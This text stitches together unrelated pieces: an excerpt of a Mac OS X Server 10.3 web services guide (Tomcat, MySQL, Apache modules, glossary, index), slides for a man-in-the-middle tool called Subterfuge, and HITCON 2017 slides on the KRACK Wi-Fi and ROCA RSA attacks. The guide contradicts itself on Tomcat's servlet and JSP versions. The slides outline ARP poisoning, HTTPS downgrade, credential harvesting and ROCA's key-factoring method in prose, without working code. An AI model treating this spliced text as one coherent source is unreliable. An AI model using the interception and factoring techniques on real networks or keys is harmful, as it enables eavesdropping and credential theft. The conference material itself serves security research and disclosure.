1 In Server Admin, click Application Server in the list for the server you want.
2 Click Settings in the button bar at the bottom of the window.
3 Click Backup at the top of the window.
4 Click either Backup or Restore and navigate to the location where you want to store or
have stored configurations.
The current configuration is backed up.
Tomcat
Tomcat is the open source servlet container that is used as the official Reference
Implementation for the Java Servlet and JavaServer Pages technologies. The Java
Servlet and JavaServer Pages specifications are developed by Sun under the Java
Community Process.
The current production series is the Tomcat 4.1.x series and it implements Java Servlet
2.3 and JavaServer Pages 1.2 specifications. More information is available from the
following sources:
• For Java Servlet specifications, see java.sun.com/products/servlets
• For JavaServer Pages specifications, see java.sun.com/products/jsp
In Mac OS X Server 10.3, you use the Application Server section of Server Admin to
manage Tomcat. Once Tomcat is started, its life cycle is managed by Server Admin,
which ensures that Tomcat starts up automatically after a power failure or after the
server shuts down for any reason.
For more information about Tomcat and documentation for this software, see
http://jakarta.apache.org/tomcat/
For information about Java Servlets that you can use on your server, see
• http://java.sun.com/products/servlet/
• http://java.sun.com/products/jsp/
If you want to use Tomcat, you must activate it. You can use Server Admin or the
command-line tool to start Tomcat.
To start Tomcat using Server Admin:
1 In Server Admin, click Application Server in the list for the server you want.
2 Click Settings in the button bar.
3 Click Tomcat Only.
4 Click Start Service.
To start Tomcat using Terminal:
1 Open the Terminal application.
2 Type the following commands:
cd /Library/Tomcat/bin
./catalina.sh start
To verify that Tomcat is running, use a browser to access port 9006 of your website by
entering the URL for your site followed by :9006. If Tomcat is running, this URL will
display the Tomcat home page.
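You can also check from the command line; for example, on the server itself:
curl http://localhost:9006/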
MySQL
MySQL provides a relational database management solution for your web server. With
this open-source software, you can link data in different tables or databases and
provide the information on your website.
The MySQL Manager application simplifies setting up the MySQL database on
Mac OS X Server. You can use MySQL Manager to initialize the MySQL database, and to
start and stop the MySQL service.
MySQL is preinstalled on Mac OS X Server, with its various files already in the
appropriate locations. At some point you may wish to upgrade to a newer version of
MySQL. You can install the new version in /usr/local/mysql, but MySQL Manager will
not be aware of the new version of MySQL and will continue to control the pre-
installed version. If you do install a newer version of MySQL, use MySQL Manager to
stop the preinstalled version, then start the newer version via the config file.
Installing MySQL
Mac OS X Server version 10.3 includes the latest MySQL, version 4.0.14. Since it's
preinstalled, you won't find it in /usr/local/mysql. Instead, its elements are distributed in
the file system according to standard UNIX file layout, with executables in /usr/sbin and
/usr/bin, man pages in /usr/share/man, and other parts in /usr/share/mysql. When
installed, the MySQL database resides in /var/mysql.
At some point a newer version of MySQL will be posted to http://www.mysql.com. At
that time you may consider downloading the source and building it yourself (if you
have the developer packages installed) or downloading the appropriate binary
distribution and installing it yourself, following the instructions posted on that website.
By default, such installations reside in /usr/local/mysql/. So if you install your own
version of MySQL, you'll have two versions of MySQL present on your system. This
should do no harm as long as you don't try to run both the old one and the new one.
Just be sure to prefix any commands intended for the new version with the full path
(starting with /usr/local/mysql), or make sure your shell's path variable is set to search
in your local directory first.
Note that the MySQL Manager application works only with the preinstalled version of
MySQL; it does not work with MySQL installed elsewhere. The paths to the various
preinstalled components of MySQL are stored in the following plist file:
/Applications/Server/MySQL Manager.app/Contents/Resources/tool_strings.
If You Are Updating from Mac OS X Server 10.x and Use MySQL
Mac OS X Server version 10.3 contains a new version of MySQL. Previous versions of the
server contain MySQL 3.23.x; the version now installed is 4.0.14, which is the latest
production version. This version is the one recommended by mysql.com.
Your MySQL 3.23.x databases should work with the new version of MySQL, but it’s a
good idea to back them up before updating.
When using MySQL 4.0.14, there are several commands you can use with your old
databases to remove dependency on the ISAM table format, which has been
deprecated over time.
• Use mysql_fix_privilege_tables to enable new security privilege features.
• Use mysql_convert_table_format (if all existing tables are ISAM or MyISAM) or use
ALTER TABLE table_name TYPE=MyISAM on all ISAM tables to get away from the
deprecated ISAM table format.
Refer to the instructions provided on the MySQL website at www.mysql.com/doc/en/
Upgrading-from-3.23.html before using these commands.
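As a sketch, the per-table conversion could be issued from the mysql client (table_name is a placeholder; back up your databases first, as noted above):
ALTER TABLE table_name TYPE=MyISAM;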
For more information about MySQL, see www.mysql.com.
7 Installing and Viewing Web Modules
Become familiar with the modules that provide key
features and controls for web service.
The Apache web server includes a series of modules that control the server’s operation.
In addition, Mac OS X Server provides some modules with specialized functions for the
Macintosh.
Apache Modules
Modules “plug in” to the Apache web server software and add functionality to your
website. Apache comes with some standard modules, and you can purchase modules
from software vendors or download them from the Internet. You can find information
about available Apache modules at the website www.apache.org/docs/mod.
To work with Apache modules:
• To view a list of web modules installed on your server, in Server Admin click Web in
the list for the server you want, choose Settings in the button bar, and click Modules.
• To enable a module, select the Enabled box beside its name, and click Save. (Web
service restarts automatically.)
• To install a module, follow the instructions that came with the module software. The
web server loads modules from the directory /usr/libexec/httpd/.
Macintosh-Specific Modules
Web service in Mac OS X Server installs some modules specific to the Macintosh. These
modules are described in this section.
mod_macbinary_apple
This module packages files in the MacBinary format, which allows Macintosh files to be
downloaded directly from your website. A user can download a MacBinary file using a
regular web browser by adding “.bin” to the URL used to access the file.
mod_sherlock_apple
This module lets Apache perform relevance-ranked searches of the website using
Sherlock. Once you index your site using the Finder, you can provide a search field for
users to search your website.
• To index a folder's contents, choose Get Info from the File menu.
Note: You must be logged in as root for the index to be copied to the web directory in
order to be searchable by a browser.
Clients must add .sherlock to your website’s URL to access a page that allows them to
search your site. For example, http://www.example.com/.sherlock.
mod_auth_apple
This module allows a website to authenticate users by looking for them in directory
service domains within the server’s search policy. When authentication is enabled,
website visitors are prompted for a user name and password before they can access
information on the site.
mod_hfs_apple
This module requires users to enter URLs for HFS volumes using the correct case
(lowercase or uppercase). This module adds security for case-insensitive volumes. If a
restriction exists for a volume, users receive a message that the URL is not found.
mod_digest_apple
The new mod_digest_apple module enables digest authentication for a WebDAV
realm.
mod_rendezvous_apple
The new mod_rendezvous_apple module allows administrators to control how
websites are registered with Rendezvous. See “Enabling Apache Rendezvous
Registration” on page 51 for more information.
Open-Source Modules
Mac OS X Server includes these popular open-source modules: Tomcat, PHP: Hypertext
Preprocessor, and mod_perl.
Tomcat
The Tomcat module, which uses Java-like scripting, is the official reference
implementation for two complementary technologies developed under the Java
Community Process. For more information about Tomcat, see “Tomcat” on page 58.
If you want to use Tomcat, you must activate it first. You use the Application Server
section of Server Admin to start Tomcat. See “Tomcat” on page 58 for instructions.
PHP: Hypertext Preprocessor
PHP lets you handle dynamic web content by using a server-side HTML-embedded
scripting language resembling C. Web developers embed PHP code within HTML code,
allowing programmers to integrate dynamic logic directly into an HTML script rather
than write a program that generates HTML.
PHP provides CGI capability and supports a wide range of databases. Unlike client-side
JavaScript, PHP code is executed on the server. PHP is also used to implement WebMail
on Mac OS X Server. For more information about this module, see www.php.net.
mod_perl
This module integrates the complete Perl interpreter into the web server, letting
existing Perl CGI scripts run without modification. This integration means that the
scripts run faster and consume fewer system resources. For more information about
this module, see perl.apache.org.
8 Solving Problems
If you experience a problem with web service or one of
its components, check the tips and strategies in this
chapter.
From time to time you may encounter a problem when setting up or managing web
services. Some of the situations that may cause a problem for administering web
service or for client connections are outlined here.
Users Can’t Connect to a Website on Your Server
Try these strategies to uncover the problem:
• Make sure that web service is turned on and the site is enabled.
• Check the Web Service Overview window to verify that the server is running.
• Check the Apache access and error logs. (If you are not sure what the messages
mean, you’ll find explanations on the Apache website at www.apache.org.)
• Make sure users are entering the correct URL to connect to the web server.
• Make sure that the correct folder is selected as the default web folder. Make sure that
the correct HTML file is selected as the default document page.
• If your website is restricted to specific users, make sure those users have access
privileges to your website.
• Verify that users’ computers are configured correctly for TCP/IP. If the TCP/IP settings
appear correct, use a “pinging” utility that allows you to check network connections.
• Verify that the problem is not a DNS problem. Try to connect with the IP address of
the server instead of its DNS name.
• Make sure your DNS server’s entry for the website’s IP address and domain name
are correct.
A Web Module Is Not Working as Expected
• Check the error log in Server Admin for information about why the module might
not be working correctly.
• If the module came with your web server, check the Apache documentation for that
module and make sure the module is intended to work the way you expected.
• If you installed the module, check the documentation that came with the web
module to make sure it is installed correctly and is compatible with your server
software.
For more information on supported Apache modules for Mac OS X Server, see
Chapter 7, “Installing and Viewing Web Modules,” on page 61 and the Apache website
at www.apache.org/docs/mod/.
A CGI Will Not Run
• Check the CGI’s file permissions to make sure the CGI is executable by www. If not,
the CGI won’t run on your server even if you enable CGI execution in Server Admin.
9 Where to Find More Information
For information about configuration files and other
aspects of Apache web service, see these resources:
• Apache: The Definitive Guide, 3rd edition, by Ben Laurie and Peter Laurie (O’Reilly and
Associates, 2002)
• CGI Programming with Perl, 2nd edition, by Scott Guelich, Shishir Gundavaram, and
Gunther Birznieks (O’Reilly and Associates, 2000)
• Java Enterprise in a Nutshell, 2nd edition, by William Crawford, Jim Farley, and David
Flanagan (O’Reilly and Associates, 2002)
• Managing and Using MySQL, 2nd edition, by George Reese, Randy Jay Yarger, Tim
King, and Hugh E. Williams (O’Reilly and Associates, 2002)
• Web Performance Tuning, 2nd edition, by Patrick Killelea (O’Reilly and Associates,
2002)
• Web Security, Privacy & Commerce, 2nd edition, by Simson Garfinkel and Gene
Spafford (O’Reilly and Associates, 2001)
• Writing Apache Modules with Perl and C, by Lincoln Stein and Doug MacEachern
(O’Reilly and Associates, 1999)
• For more information about Apache, see the Apache website: www.apache.org
• For an inclusive list of methods used by WebDAV clients, see RFC 2518. RFC
documents provide an overview of a protocol or service that can be helpful for
novice administrators, as well as more detailed technical information for experts.
You can search for RFC documents by number at this website:
www.faqs.org/rfcs
Glossary
Apache An open-source HTTP server that is integrated into Mac OS X Server. You can
find detailed information about Apache at www.apache.org.
application server Software that runs and manages other applications, usually web
applications, that are accessed using a web browser. The managed applications reside
on the same computer where the application server runs.
CGI (Common Gateway Interface) A script or program that adds dynamic functions to
a website. A CGI sends information back and forth between a website and an
application that provides a service for the site. For example, if a user fills out a form on
the site, a CGI could send the message to an application that processes the data and
sends a response back to the user.
everyone Any user who can log in to a file server: a registered user or guest, an
anonymous FTP user, or a website visitor.
HTML (Hypertext Markup Language) The set of symbols or codes inserted in a file to
be displayed on a World Wide Web browser page. The markup tells the web browser
how to display a webpage’s words and images for the user.
HTTP (Hypertext Transfer Protocol) The client/server protocol for the World Wide Web.
The HTTP protocol provides a way for a web browser to access a web server and
request hypermedia documents created using HTML.
IP (Internet Protocol) Also known as IPv4. A method used with Transmission Control
Protocol (TCP) to send data between computers over a local network or the Internet. IP
delivers packets of data, while TCP keeps track of data packets.
IP address A unique numeric address that identifies a computer on the Internet.
JavaScript A scripting language used to add interactivity to webpages.
JBoss A full-featured Java application server that provides support for Java 2 Platform,
Enterprise Edition (J2EE) applications.
Mac OS X Server An industrial-strength server platform that supports Mac, Windows,
UNIX, and Linux clients out of the box and provides a suite of scalable workgroup and
network services plus advanced remote management tools.
MySQL An open-source relational database management tool for web servers.
open source A term for the cooperative development of software by the Internet
community. The basic principle is to involve as many people as possible in writing and
debugging code by publishing the source code and encouraging the formation of a
large community of developers who will submit modifications and enhancements.
owner The person who created a file or folder and who therefore has the ability to
assign access privileges for other users. The owner of an item automatically has read/
write privileges for that item. An owner can also transfer ownership of an item to
another user.
PHP (PHP: Hypertext Preprocessor) A scripting language embedded in HTML that is
used to create dynamic webpages.
port A sort of virtual mail slot. A server uses port numbers to determine which
application should receive data packets. Firewalls use port numbers to determine
whether or not data packets are allowed to traverse a local network. “Port” usually
refers to either a TCP or UDP port.
protocol A set of rules that determines how data is sent back and forth between two
applications.
proxy server A server that sits between a client application, such as a web browser,
and a real server. The proxy server intercepts all requests to the real server to see if it
can fulfill the requests itself. If not, it forwards the request to the real server.
realm See WebDAV realm.
short name An abbreviated name for a user. The short name is used by Mac OS X for
home directories, authentication, and email addresses.
SSL (Secure Sockets Layer) An Internet protocol that allows you to send encrypted,
authenticated information across the Internet.
TCP (Transmission Control Protocol) A method used along with the Internet Protocol
(IP) to send data in the form of message units between computers over the Internet. IP
takes care of handling the actual delivery of the data, and TCP takes care of keeping
track of the individual units of data (called packets) into which a message is divided for
efficient routing through the Internet.
Tomcat The official reference implementation for Java Servlet 2.2 and JavaServer Pages
1.1, two complementary technologies developed under the Java Community Process.
URL (Uniform Resource Locator) The address of a computer, file, or resource that can
be accessed on a local network or the Internet. The URL is made up of the name of the
protocol needed to access the resource, a domain name that identifies a specific
computer on the Internet, and a hierarchical description of a file location on the
computer.
user name The long name for a user, sometimes referred to as the user’s “real” name.
See also short name.
WebDAV (Web-based Distributed Authoring and Versioning) A live authoring
environment that allows client users to check out webpages, make changes, and then
check the pages back in while a site is running.
WebDAV realm A region of a website, usually a folder or directory, that is defined to
provide access for WebDAV users and groups.
Index
A
access privileges
setting for WebDAV 10
websites 11, 14
Apache module 7, 9, 29, 51, 60, 61
Apache web server 8, 61
configuration 9
C
CA certificate 45
cache. See proxy cache
certificate file 45–47
CGI (Common Gateway Interface) 8
CGI programs
problems with 66
CGI scripts
enabling 33
installing 33
solving problems 66
CSR (certificate signing request) 45–46
D
Documents folder 13
F
folders
Documents folder 13
I
Internet servers. See web servers
J
Java
JavaServer Pages (JSP) with Tomcat 21
servlet (with Tomcat) 21
Tomcat and 21
L
logs
access 27
error 27
SSL 35
web service 22
M
Macintosh-specific web modules 61
MIME (Multipurpose Internet Mail Extension) 12
mappings 16
server response, setting 34
suffixes 11
type mapping 11
types 16
Types pane 16
understanding 11
web server responses 11
mod_auth_apple module 62
mod_hfs_apple module 62
mod_macbinary_apple module 61
mod_perl module 63
mod_sherlock_apple module 62
Multipurpose Internet Mail Extension. See MIME
MySQL Manager 59
MySQL module 59
O
open source modules 60, 62, 63
P
Perl
mod_perl 63
PHP (PHP Hypertext Preprocessor) 63
Apache module 63
enabling 36
PHP Hypertext Preprocessor (PHP) See PHP (PHP
Hypertext Preprocessor)
proxy 19
blocking websites with 20
proxy cache
enabling 19
proxy server 20
R
realms, WebDAV 10
resources
web service 67
S
scripts
See CGI scripts
Secure Sockets Layer (SSL)
See SSL (Secure Sockets Layer)
security
WebDAV 10
websites 11
Server Admin 23
configuring web server 9
mime_macosxserver.conf file 34
modifying MIME type mappings 16
SSL, enabling 47
starting or stopping web service 15
starting Tomcat 22
viewing web service logs 22
viewing web service status 22
servers
Apache web server 9
enabling SSL on 47
proxy servers 19, 20, 36
server side includes See SSI
settings
MIME types 16
web service 15
SQL 59
SquirrelMail See WebMail
SSI (server side includes) 8
enabling 33
SSL (Secure Sockets Layer) 8
certificate signing request (CSR) 45
described 9
enabling 47
setting up 35, 45
website certificate 46
T
Tomcat module 62
Java and 21
Java servlet 21
JSP (JavaServer Pages) 21
starting 21
troubleshooting
web service 65–66
U
Users 65
W
Web-based Distributed Authoring and Versioning
(WebDAV). See WebDAV (Web-based Distributed
Authoring and Versioning)
web browsers 10
WebDAV (Web-based Distributed Authoring and
Versioning) 8
defining realms 10
described 7
enabling 21, 30
security 10
setting access 31
setting access privileges 10
setting up 21
understanding 10
WebMail
about 41
configuring 43–44
enabling 42
logging in 42
mail server and 42
protocols 42
security limitations 42
SquirrelMail 41
web modules 60, 61
Mac-specific 61
open-source 62
webpages
default 13
web servers
Apache web server 9
certificate for 46–47
web service 7
configuring 9, 14
default page 13
described 7
Documents folder 13
limiting simultaneous 17
logs, viewing 22
monitoring 22
more information 67
MySQL 59
persistent connections 18
problems with 65–66
resources 67
secure transactions 9, 45–47
settings for 15
setting up 13–15
setting up websites 9
solving problems 65
SSL, enabling 20–36
starting 15
stopping 15
Tomcat 21
WebDAV 21
WebMail, managing 42–44
website privileges 14
websites 23–36
access privileges 11
assigning privileges 14
connecting to 15
connection problems 65
default page 13, 25
default Web Folder 25
directory listing 28
documents Folder 23
enabling 24
hosting 10, 14
improving performance 26
information about 23
logs 27
MIME, configuring 35
monitoring 34
security of 11
setting access port 26
setting up 9
setting up SSL 35
solving problems 65–66
web technologies
about 7
preparing for setup 7–12
| pdf |
Christopher M. Shields (r00t0v3rr1d3)
Matthew M. Toussain (0sm0s1z)
Chris – Custom Attack Tools and Project Management
Matt – Interface Design and Framework Development
Basic ARP Poison:
• Heavy Network Traffic
• Periods of MITM Loss
Python Tool With Scapy (see the sketch below):
• Intelligent Network Poison
• Dynamic Poison Retention
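As an illustration of the kind of poisoning loop such a tool performs, here is a minimal Scapy sketch (the interface, addresses, and 2-second re-poison interval are placeholder assumptions, not Subterfuge's actual code):

from scapy.all import ARP, Ether, sendp
import time

def poison(victim_ip, victim_mac, gateway_ip, iface="eth0"):
    # Tell the victim that the gateway's IP now lives at our MAC address
    pkt = Ether(dst=victim_mac) / ARP(op=2, psrc=gateway_ip,
                                      pdst=victim_ip, hwdst=victim_mac)
    while True:
        sendp(pkt, iface=iface, verbose=False)
        time.sleep(2)  # re-poison periodically to retain the MITM position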
• HTTPS Downgrade Attack
• Use as a Web Proxy
• Customizations for Subterfuge
A New MITM Tool –
• Intuitive Interface
• Easy to use
• Silent and Stealthy
• Open Source
• Server/Client Architecture
• MITM Utilities
• Module Builder
• Configuration Options
• Credential Harvesting
• HTTP Code Injection
• Denial of Service
• Network View
2017/12/07
HITCON PACIFIC
KRACK & ROCA
吳忠憲 J.-S. Wu [1,3]
陳君明 Jimmy Chen [1,2,3]
1.
NTU, National Taiwan University
2.
IKV, InfoKeyVault Technology
3.
CHROOT & HITCON
Agenda
KRACK Key Reinstallation Attacks
– Serious weaknesses in WPA2, a protocol that
secures all modern protected Wi-Fi networks
ROCA Return of Coppersmith’s Attack
– A vulnerability in the implementation of RSA
key pair generation in a cryptographic library
used in a wide range of cryptographic chips
KRACK
14 Years of WPA/WPA2
1997: WEP (completely broken)
2003: WPA
2004: WPA2
Many attacks against Wi-Fi, but
Handshake & encryption remain “secure”
– Until 2017
– KRACK discovered by Mathy Vanhoef
10 CVE IDs for KRACKs
Targeting different aspects of WPA/WPA2
– CVE-2017-130{77,78,79,80,81}
– CVE-2017-130{82,84,86,87,88}
Let’s see how to KRACK the 4-way
handshake
Before the 4-way Handshake
A client and an AP need to set up a
shared secret master key MK
“Personal” Network
MK = Password (the same pre-shared key on the AP and every client)
“Enterprise” Network
Each client shares its own master key with the AP (MK1 … MK5),
established via 802.1X / PEAP (certificate, username, password)
The 4-way Handshake
Based on a shared MK between an AP
and a client…
Mutual authentication
Negotiate a fresh temporal key TK
– for actual encryption
– can be refreshed
Msg1 (ANonce)
Msg2 (CNonce, …)
Msg3 (…)
Msg4 (…)
Client
AP
compute TK
install TK
reset PN
compute TK
install TK
reset PN
setup MK
setup MK
WPA2 Wi-Fi Encryption
3 parameters are installed on both ends
– the temporal key TK
– the RxPN (replay counter)
– the TxPN (encryption nonce)
Using CCM or GCM with AES-128
– TK is the encryption key
Msg1 (ANonce)
Msg2 (CNonce, …)
Msg3 (…)
Msg4 (…)
Client
AP
compute TK
install TK
reset PN
compute TK
install TK
reset PN
encrypted packets
setup MK
setup MK
Msg1 (ANonce)
Msg2 (CNonce, …)
Msg3 (…)
Msg4 (…)
Client
AP
compute TK
install TK
reset PN
compute TK
encrypted packets
setup MK
setup MK
Key Reinstallation
Under the same secret key…
If encryption nonce (TxPN) gets reset:
– packets can be decrypted
– packets can be spoofed (for GCM)
If replay counter (RxPN) gets reset:
– packets can be replayed
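Why nonce reuse is fatal: CCM and GCM both encrypt with an AES-CTR keystream, so two packets protected under the same key and nonce leak the XOR of their plaintexts. A minimal Python illustration (PyCryptodome; the key and nonce values are arbitrary):

from Crypto.Cipher import AES

key, nonce = b"k" * 16, b"n" * 8
p1, p2 = b"attack at dawn!!", b"defend at dusk!!"
c1 = AES.new(key, AES.MODE_CTR, nonce=nonce).encrypt(p1)
c2 = AES.new(key, AES.MODE_CTR, nonce=nonce).encrypt(p2)
xor = bytes(a ^ b for a, b in zip(c1, c2))
assert xor == bytes(a ^ b for a, b in zip(p1, p2))  # keystream cancels out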
Msg3 (…)
Msg4
Client (victim)
AP
install TK
reset PN
enc. packets
Msg3 (…)
timeout
for Msg4
Msg4
enc. packets
reinstall TK
reset PN
Reinstall an All-Zero Key
A serious bug found in wpa_supplicant
Android 6.0+ and Linux
Man-in-the-Middle
The attacker clones the AP on a second channel and spoofs the MAC addresses on both sides
(Channel 1 vs Channel 2; MACs 21:D8:29:06:B7:58 and 5B:16:E3:54:71:A6)
Many Networks are “Unaffected” by KRACK
MK = Password
Properly configured
HTTPS, TLS, VPN…
are unaffected too
KRACK the Wi-Fi Fast Roaming
Enterprise networks with multiple APs
– clients are moving
FT (Fast Transition) handshake
MK shared with both APs; the client is moving between them
KRACK the Wi-Fi Fast Roaming
Enterprise networks with multiple APs
– clients are moving
FT (Fast Transition) handshake
– similar reinstallation issue on the AP side
– no replay counter at all
– more exploitable!!!
No MitM Needed to KRACK FT
The attacker simply replays handshake messages between the two MACs
(21:D8:29:06:B7:58 and 5B:16:E3:54:71:A6)
The Root Cause of KRACK
The IEEE 802.11 standards didn’t specify
the precise behaviors
Previous formal analyses didn’t model
“key installation”
– 4-way handshake proven secure
– CCM/GCM encryption proven secure
Fix the KRACK Vulnerabilities
Both clients and APs need patches
– Android 6.0+ and Linux devices!
– APs in enterprise networks!
Don’t do the harmful key reinstallation
Mitigate at the other end
Lessons Learned (1/2)
Good spec & correct code
Abstract model vs. reality
Lessons Learned (2/2)
What if some part of your infrastructure is
compromised?
– control the threats
Encrypt everything properly in transit
– don’t assume enough (if any) security from
(wireless) LAN
– HTTPS, TLS, VPN
ROCA
Crypto Flaws on Chips
EasyCard (悠遊卡) / Mifare Classic, NXP, 2008
Citizen Certificate (自然人憑證), Renesas, 2013
– “Coppersmith in The Wild”
Devices around the world, Infineon, 2017
– “Return of Coppersmith’s Attack (ROCA)”
– CVE-2017-15361
EasyCard / Mifare NXP
The "Mifare Classic" RFID chip is used in hundreds of
transport systems — London, Boston, Los Angeles,
Amsterdam, Taipei, Shanghai, Rio de Janeiro — and as
an access pass in thousands of companies, schools,
hospitals, and government buildings all over the world
The group that broke Mifare Classic is from
Radboud University Nijmegen in the Netherlands
The security of Mifare Classic is terrible —
kindergarten cryptography
Source: Schneier on Security
https://www.schneier.com/blog/archives/2008/08/hacking_mifare.html
EasyCard / Mifare NXP
NXP called disclosure of the attack “irresponsible”,
warned that it will cause “immense damages”
The Dutch court would have none of it: “Damage
to NXP is not the result of the publication of the
article but of the production and sale of a chip that
appears to have shortcomings”
NXP Semiconductors lost the court battle to
prevent the researchers from publishing
Source: Schneier on Security
https://www.schneier.com/blog/archives/2008/08/hacking_mifare.html
EasyCard / Mifare NXP
https://www.ithome.com.tw/node/63075
EasyCard / Mifare NXP
http://news.ltn.com.tw/news/society/paper/658204
Crypto Flaws on Chips
EasyCard (悠遊卡) / Mifare Classic, NXP, 2008
Citizen Certificate (自然人憑證), Renesas, 2013
– “Coppersmith in The Wild”
Devices around the world, Infineon, 2017
– “Return of Coppersmith’s Attack (ROCA)”
– CVE-2017-15361
Citizen Certificate Renesas
The Renesas HD65145C1 chip is a "High-Security
16-bit Smart Card Microcontroller" used in many
high-security applications, including banking
This chip received a certificate certifying that the chip
was conformant with Protection Profile BSI-PP-0002-
2001 at Common Criteria assurance level EAL4+
HD65145C1 was used in the Chunghwa Telecom
HICOS PKI Smart Card, which received FIPS 140-2
Validation Certificate at Level 2 from NIST, USA
Source: Coppersmith in the wild
https://smartfacts.cr.yp.to/index.html
103 Citizen Certificates using the Renesas HD65145C1 chip
were broken by computing GCDs of RSA public moduli
– Some RSA moduli N1 = p q and N2 = p r
– GCD(N1, N2) = p, thus both N1 and N2 are factored
Most frequent primes found
– 0xc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002f9
– 0xc92424922492924992494924492424922492924992494924492424922492924992494924492424922492924992494924492424922492924992494924492424e5
– 0xf6dbdb6ddb6d6db66db6b6dbb6dbdb6ddb6d6db66db6b6dbb6dbdb6ddb6d6db66db6b6dbb6dbdb6ddb6d6db66db6b6dbb6dbdb6ddb6d6db66db6b6dbb6dbdbc1
Citizen Certificate Renesas
Source: Coppersmith in the wild
https://smartfacts.cr.yp.to/index.html
https://smartfacts.cr.yp.to/smartfacts-20130916.pdf
Citizen Certificate Renesas
http://www.moi.gov.tw/info/news_content.aspx?sn=7771&page=0
Lattice
L = { a1·u1 + a2·u2 | a1, a2 ∈ ℤ } is a 2-dim lattice
(u1, u2): good basis
(v1, v2): bad basis
Image courtesy:
https://en.wikipedia.org/wiki/Lattice_reduction
SVP (Shortest Vector
Problem) is hard if the
dimension is high
Coppersmith's Attack
RSA modulus N = p q
If p = ax + b where a, b are known, and
x is small enough, then x can be found
by Don Coppersmith’s algorithm
Generate a lattice by known information
(N, a, b), then solve SVP on the lattice
Crypto Flaws on Chips
EasyCard (悠遊卡) / Mifare Classic, NXP, 2008
Citizen Certificate (自然人憑證), Renesas, 2013
– “Coppersmith in The Wild”
Devices around the world, Infineon, 2017
– “Return of Coppersmith’s Attack (ROCA)”
– CVE-2017-15361
ROCA
ROCA Return of Coppersmith’s Attack
The vulnerability was discovered by Slovak
and Czech security researchers from the
Centre for Research on Cryptography and
Security at Masaryk University, Czech
Republic; Enigma Bridge Ltd, Cambridge, UK;
and Ca' Foscari University of Venice, Italy
Prime Generation
Textbook prime generation for RSA-1024
– Choose a 512-bit random odd integer: 1 [510 random bits] 1
– Test divisibility for small primes: 3, 5, 7, 11, …
– Run the Miller-Rabin test enough times
• Reference Standard: FIPS 186-4
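A compact Python sketch of this textbook procedure (the round count and candidate layout are illustrative, not lifted from FIPS 186-4):

import random

def is_probable_prime(n, rounds=40):
    # trial division by a few small primes, then Miller-Rabin
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = random.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def textbook_prime(bits=512):
    while True:
        cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1  # 1 [510 random bits] 1
        if is_probable_prime(cand):
            return cand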
Earlier Work
https://www.usenix.org/node/197198
Motivation
Distribution of RSA keys modulo small primes
https://crocs.fi.muni.cz/_media/public/papers/ccs-nemec-handout.pdf
Black-Box Attack
The researchers had access neither to the
library’s source code nor to the object code
– Stored only in the secure on-chip memory and not extractable
The whole analysis was performed solely using
RSA keys generated and exported from the
Infineon’s cards and tokens
Not based on any weakness in an RNG or any
additional side-channel information
https://crocs.fi.muni.cz/_media/public/papers/nemec_roca_ccs17_preprint.pdf
Infineon’s Primes
512-bit primes (RSA-1024) are generated as
p = k × M + (65537^a mod M)
• M = 2 × 3 × 5 × ⋯ × 349 × 353 is fixed
– 475 bits, the product of the first 71 primes
• k is a 37-bit random integer
• a is a 135-bit random integer
– the order of the cyclic subgroup ⟨65537⟩ in the multiplicative group (ℤ/Mℤ)* has 135 bits
• Entropy: 37 + 135 = 172 bits
Why the Formula?
Infineon's prime generation is much faster than the textbook method
p = k × M + (65537^a mod M) = kM + 65537^a − tM for some t ∈ ℤ
– for every small prime q ≤ 353: q | M and q ∤ 65537, so q ∤ p
– all trial divisions of p by small primes can be skipped
– before any primality test, the probability that the candidate p is prime is already much higher
Fingerprint
An RSA modulus N is generated by Infineon's chip if and only if (almost) c = log_65537 N (mod M) exists!
N = p × q
= (k_p × M + (65537^a_p mod M)) × (k_q × M + (65537^a_q mod M))
= (k_p k_q M + k_p (65537^a_q mod M) + k_q (65537^a_p mod M)) × M + (65537^a_p mod M)(65537^a_q mod M)
≡ 65537^(a_p + a_q) ≡ 65537^c (mod M)
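This yields a cheap fingerprint test needing only the public modulus: N mod r must land inside the subgroup generated by 65537 mod r for every small prime r dividing M. A simplified Python sketch (this prime list is illustrative; the published detector uses a tuned set):

def roca_fingerprint(n, primes=(11, 13, 17, 19, 37, 53, 61, 71, 73, 79, 97)):
    for r in primes:
        allowed = {pow(65537, a, r) for a in range(r)}  # subgroup <65537> mod r
        if n % r not in allowed:
            return False   # definitely not generated this way
    return True            # matches the fingerprint (probably vulnerable)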
Discrete Logarithm
How hard is solving N ≡ 65537^c (mod M)?
– the 135-bit order of ⟨65537⟩ is huge
– however:
• |⟨65537⟩| divides |(ℤ/Mℤ)*| by Lagrange's theorem
• |(ℤ/Mℤ)*| = φ(M) = ∏_{q|M} (q − 1) is a product of small primes, where φ is the Euler φ function
• hence solving N ≡ 65537^c (mod M) with the Pohlig–Hellman algorithm (divide and conquer) is pretty easy
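Because φ(M) is smooth, an off-the-shelf Pohlig–Hellman implementation suffices, for example with SymPy (toy-sized M for illustration):

from sympy.ntheory import discrete_log

M = 2 * 3 * 5 * 7 * 11 * 13          # toy stand-in for the 475-bit primorial
c = discrete_log(M, pow(65537, 42, M), 65537)
assert pow(65537, c, M) == pow(65537, 42, M)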
Naïve Factoring
N = p × q = (k_p M + (65537^a_p mod M)) × (k_q M + (65537^a_q mod M)) ≡ 65537^(a_p + a_q) ≡ 65537^c (mod M)
Once c is found, try all possible a_p (the corresponding a_q is then determined), solve for k_p with Coppersmith's algorithm, and p is obtained
However, this fails: there are too many possibilities (≈ 2^135) for a_p
Solution: try a smaller M′ | M that keeps primes of the same form
Practical Factoring
Choose M′ | M with 286 bits
The cyclic subgroup ⟨65537⟩ in (ℤ/M′ℤ)* has 31-bit order (possibilities of a′_p), which is small enough
N = p × q = (k′_p M′ + (65537^a′_p mod M′)) × (k′_q M′ + (65537^a′_q mod M′)) ≡ 65537^(a′_p + a′_q) ≡ 65537^c′ (mod M′)
Find c′, try all possible a′_p (the corresponding a′_q is then determined), solve for k′_p (226 bits) with Coppersmith's algorithm, and p is obtained
RSA 1024 & 2048
97.1 CPU days to factor an RSA-1024
modulus produced by Infineon chips
– Parallelization is straightforward
– Less than 1 day if parallelized with 100 cores
